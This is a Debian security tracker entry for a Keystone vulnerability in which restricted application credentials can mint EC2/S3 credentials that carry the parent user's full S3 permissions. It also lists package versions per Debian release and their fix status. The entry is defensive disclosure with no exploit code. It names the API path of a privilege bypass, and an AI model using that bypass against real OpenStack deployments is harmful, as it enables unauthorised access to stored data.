CVE-2026-33551

NameCVE-2026-33551
DescriptionAn issue was discovered in OpenStack Keystone 14 through 26 before 26.1.1, 27.0.0, 28.0.0, and 29.0.0. Restricted application credentials can create EC2 credentials. By using a restricted application credential to call the EC2 credential creation API, an authenticated user with only a reader role may obtain an EC2/S3 credential that carries the full set of the parent user's S3 permissions, effectively bypassing the role restrictions imposed on the application credential. Only deployments that use restricted application credentials in combination with the EC2/S3 compatibility API (swift3 / s3api) are affected.
SourceCVE (at NVD; CERT, ENISA, LWN, oss-sec, fulldisc, Debian ELTS, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, GitHub advisories/code/issues, web search, more)
Debian Bugs1133118

Vulnerable and fixed packages

The table below lists information on source packages.

Source PackageReleaseVersionStatus
keystone (PTS)bullseye2:18.0.0-3+deb11u1vulnerable
bullseye (security)2:18.1.0-1+deb11u2vulnerable
bookworm, bookworm (security)2:22.0.2-0+deb12u1vulnerable
trixie (security), trixie2:27.0.0-3+deb13u1vulnerable
forky, sid2:29.0.1-1fixed

The information below is based on the following data on fixed versions.

PackageTypeReleaseFixed VersionUrgencyOriginDebian Bugs
keystonesource(unstable)2:29.0.0-21133118

Notes

[trixie] - keystone <no-dsa> (Minor issue)
[bookworm] - keystone <no-dsa> (Minor issue)
https://launchpad.net/bugs/2142138
https://www.openwall.com/lists/oss-security/2026/04/07/12
Search for package or bug name: Reporting problems